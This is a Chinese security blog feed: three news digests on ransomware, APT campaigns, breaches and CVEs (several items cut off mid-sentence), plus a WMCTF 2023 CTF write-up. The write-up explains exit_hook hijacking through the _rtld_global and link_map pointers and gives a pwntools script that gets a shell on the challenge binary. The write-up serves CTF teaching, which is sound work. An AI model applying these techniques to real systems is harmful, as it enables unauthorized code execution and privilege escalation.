1、1.2W个 Juniper SRX 防火墙和 EX 交换机受 CVE-2023-36845 影响 https://securityaffairs.com/151037/hacking/12000-juniper-devices-cve-2023-36845.html 研究人员发现大约 12,000 个Juniper网络 SRX 防火墙和 EX 交换机容易受到最近披露的 CVE-2023-36845 RCE 缺陷的影响。 2、SHROUDEDSNOOPER 威胁行为者针对中东电信公司 https://securityaffairs.com/151055/apt/shroudedsnooper-targeting-telco-in-middle-east.html ShroudedSnooper 威胁行为者通过名为 HTTPSnoop 的后门瞄准中东的电信服务提供商。思科 Talos 研究人员最近发现了一种名为 HTTPSnoop 的新隐形植入物，该植入物被用于针对中东电信提供商的攻击。 3、最近的网络攻击导致 CLOROX 产品短缺 https://securityaffairs.com/151046/security/clorox-products-shortage.html 高乐氏公司是一家跨国消费品公司，专门生产和销售各种家用和专业清洁、健康和个人护理产品。这家清洁产品巨头于 8 月中旬宣布，它是网络安全事件的受害者，迫使其部分系统下线。 4、新的 AMBERSQUID 恶意挖矿行动针对不常见的 AWS 服务 https://thehackernews.com/2023/09/new-ambersquid-cryptojacking-operation.html 一种新颖的云原生加密劫持操作将目光投向了不常见的 Amazon Web Services (AWS) 产品，例如 AWS Amplify、AWS Fargate 和 Amazon SageMaker，以非法开采加密货币。 5、APT36组织利用伪造的YouTube应用程序感染安卓设备 https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/ APT36 黑客组织（又名“透明部落”）使用至少三个模仿 YouTube 的 Android 应用程序，通过其签名远程访问木马“CapraRAT”感染设备。一旦恶意软件安装在受害者的设备上，它就可以收集数据、记录音频和视频或访问敏感通信信息，本质上就像间谍软件工具一样运行。 6、软件开发公司Retool遭遇钓鱼攻击影响27个云客户端 https://retool.com/blog/mfa-isnt-mfa/ 软件开发公司 Retool 披露，其 27 名云客户的账户在一次有针对性的基于短信的社会工程攻击后遭到泄露。这家总部位于旧金山的公司指责2023 年 4 月最近推出的Google 帐户云同步功能使泄露事件变得更严重，称其为“黑暗模式”。该公司工程主管称，Google Authenticator 同步到云端的事实是一种新颖的攻击媒介。该公司最初实施的是多重身份验证。但通过这次 Google 更新，以前的多重身份验证已悄然变成了单因素身份验证。该事件发生于 2023 年 8 月 27 日，不允许对本地或托管帐户进行未经授 7、BlackCat勒索软件利用Sphynx加密器攻击Azure云存储 https://infosec.exchange/@SophosXOps/111059622083722634 BlackCat (ALPHV) 勒索软件团伙现在使用被盗的 Microsoft 帐户和最近发现的 Sphynx 加密器来加密目标的 Azure 云存储。在调查最近的一次违规行为时，Sophos X-Ops 事件响应人员发现攻击者使用了新的 Sphynx 变体，并增加了对使用自定义凭据的支持。 使用被盗的一次性密码获得对 Sophos Central 帐户的访问权限后，他们禁用了防篡改功能并修改了安全策略。使用 LastPass Chrome 扩展从受害者的 LastPass 金库 8、LOCKBIT勒索软件组织针对两家纽约医院发起网络攻击 https://securityaffairs.com/150835/cyber-crime/lockbit-ransomware-carthage-area-hospital.html Lockbit 勒索软件组织声称入侵了两家主要医院：迦太基地区医院和克拉克斯顿-赫本医疗中心。这两家医院为纽约州北部的数十万人提供服务。这次网络攻击发生在八月底，过去几周对两家医院造成了严重影响。电话系统于 9 月 2 日恢复，但网络攻击影响了其他几项服务。作为预防措施，迦太基和克拉克斯顿的急诊室已被转移，患者被劫持到其他地区医院，大部分预约也被重新安排。两家医院仍在努力从网络攻击中恢复过来。本周，Lock 9、攻击者使用NodeStealer恶意软件针对Facebook企业帐户发起攻击 https://www.netskope.com/blog/new-python-nodestealer-goes-beyond-facebook-credentials-now-stealing-all-browser-cookies-and-login-credentials 研究人员披露一项正在进行的活动正在针对 Facebook Business 帐户发送虚假消息，使用基于 Python 的NodeStealer 变体获取受害者的凭据，并可能接管他们的帐户以进行后续恶意活动。这些攻击的受害者主要分布在南欧和北美的不同领域，其中以制造服务和技术行业为首。研究人员于 2023 年 5 月 10、谷歌同意就加州位置隐私诉讼达成 9300 万美元和解 https://thehackernews.com/2023/09/google-agrees-to-93-million-settlement.html 谷歌已同意支付 9300 万美元，以解决美国加利福尼亚州就其位置隐私行为误导消费者和违反消费者保护法的指控提起的诉讼。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

0x01 前言 在计算机安全领域，漏洞的危险性往往与其广泛性和潜在攻击方式密切相关。今天，我们将深入探讨一个异常危险的漏洞，它存在于程序退出时执行的常见函数"exit"中。无论是在操作系统还是应用程序中，"exit"都是一个普遍存在的函数，通常用于正常退出程序。但这种普遍性也使得它成为了潜在的攻击目标。 这个漏洞的威胁性在于，它不仅存在于各种程序中，而且有多种潜在的攻击方式。攻击者可以通过利用这一漏洞来执行恶意代码，获取系统权限，或者实施其他恶意行为。要理解这个漏洞的威胁，我们需要深入分析其背后的原理以及不同的利用方式。 在本文中，我们将探讨这个漏洞的具体情况，并详细分析了两种主要的利用方式：一种是将程序流转向libc库中的函数，另一种是将程序流转向程序本身的代码段。我们将深入研究这两种攻击方式的原理，并展示了一个实际漏洞利用的示例。 "blindless"是来自WMCTF 2023比赛的一个题目，虽然难度不高，但要深入理解并利用其中的漏洞，需要花费大量时间。本文总结了有关"exit_hook2libc"和"exit_hook2elf"的利用方法，旨在分享给大家学习。这题的关键是深入理解程序退出时执行的"exit"函数，以及如何通过不同方式实现漏洞利用。 0x02 exit_hook的n种姿势 基地址放在此处供各位参考一下，用于计算指令偏移。 exit_hook2libc 首先是p &_rtld_global（看地址），他有一个rtld_lock_default_lock_recursive和rtld_lock_default_unlock_recursive的元素可以改来调用。 注意一定要用docker或者虚拟机，否则没有符号表会特别坐牢！ 执行p _rtld_global。看到那两个rtld_lock_default_lock_recursive和rtld_lock_default_unlock_recursive吗，就是他们两个。我们可以修改他们的内容，从而作为exithook进行调用（直接call）。把后面的东西复制过来p &xxx就可以查看其地址了。 注意看，这个程序叫小帅，他调用的第一个参数就是rdi，是_rtld_global+2312，我们可以控制他的参数为/bin/sh\x00然后做坏坏的事情（如果能把rtld_lock_default_lock_recursive也改成system的话）。 然后rtld_lock_default_unlock_recursive的参数也是2312这个偏移。 注意这个2312是十进制。 好的，我们就修改这两个地方就可以为所欲为了，但是exit_hook到这里还没完。 并且严格来说，这里并不是完全的exit_hook2libc，如果知道elf的地址也完全可以返回到elf上的函数。 接下来还有更骚的，可以控制到程序上的地址（直接跳转，或者间接取地址跳转。） exit_hook2elf 1.间接call 这个在这里，第一个是间接call，即指令是call qword ptr [寄存器]，意思就是从寄存器的地址指向的内存里取地址，然后call。 对于间接call的利用，我们可以修改他的偏移到任意函数got表，然后配合参数rdi_rtld_global+2312使用。 例如修改_rtld_global+2312为"/bin/sh\x00" 这个的基地址和偏移是存在于link_map的，这样可以找到他的地址。 调试可以看到他会从这个地址的内存中取elf基地址，然后通过link_map地址+0x110存的地址取偏移。我们可以改基地址也可以选择改偏移。link_map地址+0x110是存第一个间接call的偏移的。 注意存的是偏移-8的地址，也就是如果要改的话要改成目标-8。 2.直接call link_map地址+0xa8是存第二个直接call的偏移 注意存的是偏移-8的地址，也就是如果要改的话要改成目标-8。 如果改偏移的话能改最好，还能直接形成调用链子。但是如果没有偏移，就只能改基地址了——也就是p &l出来那儿。但是这样肯定会损坏第一次call r14的，会导致无法正常进行。 但是发现有一个地方判断可以跳过call r14。 就是这里，test edx,edx是edx和edx相互and，留下标志位。简单来说就是如果是0，那么不跳转。如果是1，那么跳转。 在x86汇编中，je 指令的作用是： 检查零标志位（ZF）是否被设置为 1。 如果零标志位被设置为 1，将进行跳转到指定的目标位置。 回溯发现是从link_map+0x120取来的地址，也就是说想要这里为0，就把那里的地址指向为0的地方即可！不过也要注意，这里取的是地址+8，也就是我们要改成目标地址-8改进去。这里直接找bss段之类的即可。 完成这个操作，就可以修改基地址达到任意直接call的效果了！即使没有泄露，也可直接返回到程序上（比如此题有后门）。如果有，那就是为所欲为！（和前面一样，如果有泄露真的就是为所欲为了）。 0x03 exp 那么本题目由于有brainfuck函数可以执行任意地址写，则根据前面的exit_hook可以做到提权。 from pwn import * n2b = lambda x   : str(x).encode() rv  = lambda x   : p.recv(x) rl  = lambda     :p.recvline() ru  = lambda s   : p.recvuntil(s) sd  = lambda s   : p.send(s) sl  = lambda s   : p.sendline(s) sn  = lambda s   : sl(n2b(n)) sa  = lambda t, s : p.sendafter(t, s) sla = lambda t, s : p.sendlineafter(t, s) sna = lambda t, n : sla(t, n2b(n)) ia  = lambda     : p.interactive() rop = lambda r   : flat([p64(x) for x in r]) uu64=lambda data :u64(data.ljust(8,b'\x00')) while True:        context(os='linux', arch='amd64', log_level='debug')        p = process('./main')        context.terminal = ['tmux','new-window' ,'-n','-c']        #gdb.attach(p)        sla('ze',b'-10')#分配到libc上（用mmap）        sla('ze',b'256')        pay = b'@'+p32(2148618432)#到ld的地址+0x2f190的偏移        pay += b'@'+p32(2148618432)        pay +=b'.' + b'\xb1'        pay += b'>.' + b'\x7c'#使得加了偏移之后是后门函数地址        pay += b'@'+p32(0x11f)#修改0x120的地址，指向0，跳过call r14        pay +=b'.' + b'\x00'        pay += b'q'        sla('code\n',pay)        re = p.recvrepeat(0.1)#一直接收直到有回显        #如果是system的话可以发一个cat flag再这样        #这是个很好的爆破方式，学习学习        if re:            print('pwned!get your flag here:',re)            exit(0)        p.close()

1、Lazarus组织涉嫌盗取CoinEx交易所3100万美元的加密货币 https://thehackernews.com/2023/09/north-koreas-lazarus-group-suspected-in.html 自 2023 年 6 月以来，朝鲜附属的 Lazarus 集团已窃取近 2.4 亿美元的加密货币，标志着其黑客攻击大幅升级。根据已发布的多份报告，据该APT组织涉嫌于 2023 年 9 月 12 日从CoinEx 交易所盗窃了 3100 万美元的数字资产。针对 CoinEx 的加密货币盗窃案是近期针对 Atomic Wallet（1 亿美元）、CoinsPaid（3730 万美元）、Alphapo（6000 万美元）和 Stake.co 2、研究人员披露Turla组织最近活跃的十种恶意软件 https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/ Turla（又名 Peptic Ursa、Uroburos、Snake）是一个总部位于俄罗斯的威胁组织，至少自 2004 年起就开始活动，与俄罗斯联邦安全局 (FSB) 有联系。研究人员介绍 Peptic Ursa 武器库中最近活跃的 10 种恶意软件类型：Capibar、Kazuar、Snake、Kopiluwak、QUIETCANARY/Tunnus、Crutch、ComRAT、Carbon、HyperStack 和 TinyTurla。 3、研究人员披露Bumblebee恶意软件的网络攻击活动 https://intel471.com/blog/bumblebee-loader-resurfaces-in-new-campaign Bumblebee 是一种加载程序，越来越多地被与勒索软件相关的攻击者使用，其中包括现已不复存在的 Conti 病毒和相对较新的 Akira。Bumblebee 采用 C++ 编程语言编写，被多个威胁参与者用来确保在高价值企业环境中获得初步立足点。Bumblebee 最近中断了两个月，这通常发生在攻击者暑假期间。但在 2023 年 8 月底，Bumblebee 的运营商恢复了活动。英特尔 471 恶意软件情报系统发现了利用新技术传播 Bumblebee 4、研究人员披露Akira勒索软件利用虚拟机以绕过EDR https://cybercx.com.au/blog/akira-ransomware/ Akira 勒索软件组织自 2023 年 4 月以来一直在攻击受害者。研究人员观察到的一项新技术利用了将勒索软件部署到 Windows Hyper-V 虚拟机管理程序系统上，导致连接的虚拟机 ( VM )受到严重损坏。即使基于 Windows 的虚拟机管理程序和目标虚拟机正在运行重要的端点检测和响应 ( EDR ) 工具，威胁行为者也会通过在虚拟机管理程序上创建新的、不受监控的虚拟机来规避这一点，他们可以从中导航虚拟机管理程序上的目录并执行他们的勒索软件。 5、微软AI研究部门意外泄露38TB敏感数据 https://securityaffairs.com/151004/data-breach/microsoft-ai-data-leak.html 网络安全公司 Wiz 发现，微软 AI 研究部门在 GitHub 上发布一桶开源训练数据时，意外泄露了 38TB 的敏感数据。暴露的数据暴露了两名员工工作站的磁盘备份，其中包含机密、私钥、密码和超过 30,000 条内部 Microsoft Teams 消息。 6、名为"USDOD"的威胁行为者宣布泄露高度敏感的 TRANSUNION 数据 https://securityaffairs.com/150968/data-breach/transunion-data-leak.html TransUnion 是一家美国消费者信用报告机构。TransUnion 收集并汇总了 30 多个国家/地区超过 10 亿个人消费者的信息，其中包括“2 亿份文件，分析了美国几乎所有信用活跃的消费者”。一个绰号为“ USDoD ”的威胁行为者宣布泄露了据称从信用报告机构窃取的高度敏感数据。泄露的数据库大小超过 3GB，包含约 58,505 人的敏感 PII，遍布全球，包括美国和欧洲。 7、Fortinet 修补FortiOS、FortiProxy、FortiWeb中的高危漏洞 https://www.securityweek.com/fortinet-patches-high-severity-vulnerabilities-in-fortios-fortiproxy-fortiweb-products/ Fortinet 已针对影响多个 FortiOS 和 FortiProxy 版本的高严重性跨站脚本 (XSS) 漏洞发布了补丁。 8、Clop 勒索团伙窃取北卡罗来纳州主要医院的数据 https://securityaffairs.com/150949/cyber-crime/north-carolina-hospitals-data-breach.html 微软旗下的医疗技术公司 Nuance 透露，作为 Progress MOVEit Transfer 活动的一部分，Clop 勒索团伙窃取了北卡罗来纳州主要医院的个人数据。 9、Google 将 Chromebook 的安全更新支持期限延长 10 年 https://www.bleepingcomputer.com/news/security/google-extends-security-update-support-for-chromebooks-to-10-years/ 谷歌表示，从 2024 年开始，2021 年之后发布的所有 Chromebook 将自动获得为期十年的安全更新，每四个星期自动向设备发送一次。 10、N-Able曝高危漏洞，能任意删除Windows系统文件 https://www.freebuf.com/news/378432.html Google 旗下威胁情报公司Mandiant近期披露了在N-Able Take Control Agent 中发现的一个高严重性安全漏洞，本地非特权攻击者可以利用该漏洞来获取Windows系统权限。该漏洞被追踪为CVE-2023-27470（CVSS 评分：8.8），与 TOCTOU 竞争条件漏洞有关。TOCTOU属于软件缺陷类别漏洞，其中程序会检查资源状态的特定值，但该值在实际使用之前发生变化，从而使检查结果无效。利用此类缺陷可能会导致完整性丧失，并诱骗程序执行不应执行的操作，从而允许攻击者访问未经授权的资 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、APT33组织利用密码喷洒攻击针对美国卫星国防机构 https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/ 研究人员表示，自 2023 年 2 月以来，一个伊朗支持的威胁组织已针对美国和世界各地的数千个组织发起了密码喷洒攻击。国家黑客还从国防、卫星和制药领域的有限数量的受害者那里窃取了敏感信息。该网络间谍组织被追踪为 APT33（又名 Peach Sandstorm、HOLMIUM 或 Refine 2、攻击者滥用Google广告冒充知名品牌传播DanaBot僵尸网络 https://www.malwarebytes.com/blog/threat-intelligence/2023/09/ongoing-webex-malvertising-drops-batloader 威胁行为者利用 Google Ads 跟踪模板作为漏洞来创建令人信服的 Webex 软件搜索广告，将用户重定向到分发 BatLoader 恶意软件的网站。Webex 是一个视频会议和联络中心套件，是思科协作产品组合的一部分，被全球的公司和企业使用。恶意广告活动已在 Google 搜索中活跃一周，攻击者似乎来自墨西哥。恶意 Google 广告冒充官方 Webex 下载门户，在“webex 3、新西兰地方交通局疑似因勒索软件攻击大范围停电 https://at.govt.nz/bus-train-ferry/service-announcements/at-hop-technical-outage 新西兰奥克兰交通局 (AT) 正在处理因网络事件造成的大范围停电，影响了广泛的客户服务。AT 是奥克兰地区政府拥有的地区交通管理局，负责渡轮、公共汽车和火车等公共交通，以及设计和建设道路和其他基础设施。该公司今天宣布，由于网络事件影响了部分网络，其 HOP 服务（集成票务和票价系统）遇到问题。AT 服务已因攻击而受到影响。例如，在线充值以及使用 AT 网站上的 MyAT HOP 的其他 AT HOP 服务。售票机和充值机仅接受现金付 4、英国曼彻斯特警察数据在勒索软件攻击中泄露 https://www.gmp.police.uk/news/greater-manchester/news/news/2023/september/greater-manchester-police-statement-on-data-breach/ 英国大曼彻斯特警察局 (GMP) 今天早些时候表示，其部分员工的个人信息受到第三方供应商勒索软件攻击的影响。今天发布的声明中未提及受影响的组织，该组织是 GMP 和英国其他组织的服务供应商。GMP 认为被黑客入侵的系统上的数据不包含属于警察局员工的财务信息。助理警长称，他们意识到勒索软件攻击影响了英国各个组织的第三方供应商，其中包括 GMP， 5、美国联邦政府警告医疗保健部门警惕Akira勒索软件威胁 https://www.healthcareinfosecurity.com/feds-warn-healthcare-sector-akira-ransomware-threats-a-23073 联邦当局就 Akira 构成的威胁向卫生部门发出警告，Akira 是一个勒索软件即服务组织，大约六个月前出现，与许多行业中以中小型实体为主的数十起攻击有关。美国卫生与公众服务部卫生部门网络安全协调中心在周二发布的威胁警报中表示，该组织似乎更青睐尚未在虚拟专用网络上部署多因素身份验证的组织。Akira 进行双重勒索攻击，涉及数据盗窃，然后进行勒索软件加密，似乎通过多种方法获得初始恶意软件交付，包括 6、研究人员发现ncurses库中影响Linux和macOS系统的漏洞 https://thehackernews.com/2023/09/microsoft-uncovers-flaws-in-ncurses.html 在ncurses（新的curses的缩写）编程库中发现了一组内存损坏缺陷，威胁者可以利用这些缺陷在易受攻击的 Linux 和 macOS 系统上运行恶意代码。通过篡改环境变量，攻击者可以串联这些漏洞来提升权限并在目标程序的上下文中运行代码或执行其他恶意操作。这些漏洞统称为CVE-2023-29491（CVSS 评分为 7.8），已于 2023 年 4 月得到解决。微软表示，它还与苹果合作解决与这些缺陷相关的 macOS 特定问题。环境变量是用户 7、荷兰足球协会承认为被盗员工数据向攻击者支付赎金 https://therecord.media/dutch-football-association-paid-ransom-lockbit 荷兰足球管理机构本周表示，它已向今年早些时候入侵其系统并窃取超过 120 万名员工和会员敏感数据的黑客支付了赎金。荷兰皇家足球协会 (KNVB) 并未透露赎金金额有多大，但它证实， LockBit 勒索软件团伙确实是此次攻击的幕后黑手。总部位于宰斯特的 KNVB 负责管理该国主要的职业联赛、荷兰男子和女子国家队、荷兰杯和业余联赛。4 月份，KNVB 领导层宣布了这一事件，称该组织的业务运营没有受到影响，但入侵者已经获取了个人数据。荷兰执法机构和荷兰数据 8、米高梅ESXi服务器遭遇勒索软件加密攻击 https://www.bleepingcomputer.com/news/security/mgm-casinos-esxi-servers-allegedly-encrypted-in-ransomware-attack/ BlackCat 勒索软件组织的一个附属机构（也称为 APLHV）是此次攻击的幕后黑手，该攻击扰乱了米高梅度假村的运营，迫使该公司关闭 IT 系统。BlackCat 勒索软件组织在今天的一份声明中声称，自周五以来，他们已经渗透到 MGM 的基础设施中，并在该公司摧毁了内部基础设施后对 100 多个 ESXi 虚拟机管理程序进行了加密。该攻击组织表示，他们已经从网络中窃 9、凯撒娱乐公司向攻击者支付赎金避免被盗数据泄露 https://www.wsj.com/business/hospitality/caesars-paid-ransom-after-suffering-cyberattack-7792c7f0 凯撒娱乐公司自称是美国最大的连锁赌场，拥有业内最广泛的忠诚度计划，该公司表示，它支付了赎金，以避免在最近的网络攻击中被盗的客户数据在线泄露。Caesars 于 9 月 7 日发现，攻击者窃取了其忠诚度计划数据库，该数据库存储了许多客户的驾驶执照号码和社会安全号码。凯撒周四向美国证券交易委员会提交的一份 8-K 表格称，凯撒娱乐仍在调查未经授权的行为者获取的文件中包含的任何其他个人或其他敏感信息的范围 10、TIKTOK 因儿童隐私问题被爱尔兰 DPC 罚款 3.45 亿欧元 https://securityaffairs.com/150918/breaking-news/tiktok-fined-e345m-irish-dpc.html 爱尔兰数据保护委员会 (DPC)因侵犯儿童隐私而对 TikTok 处以 3.45 亿欧元罚款。爱尔兰数据监管机构发现，这款流行的视频共享应用程序允许成年人向某些与他们没有家庭联系的青少年发送直接消息。DPC 进行的调查显示，TikTok 的“家庭配对”功能存在严重缺陷，可能会被滥用，将儿童账户与“未经验证”的成年人关联起来。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。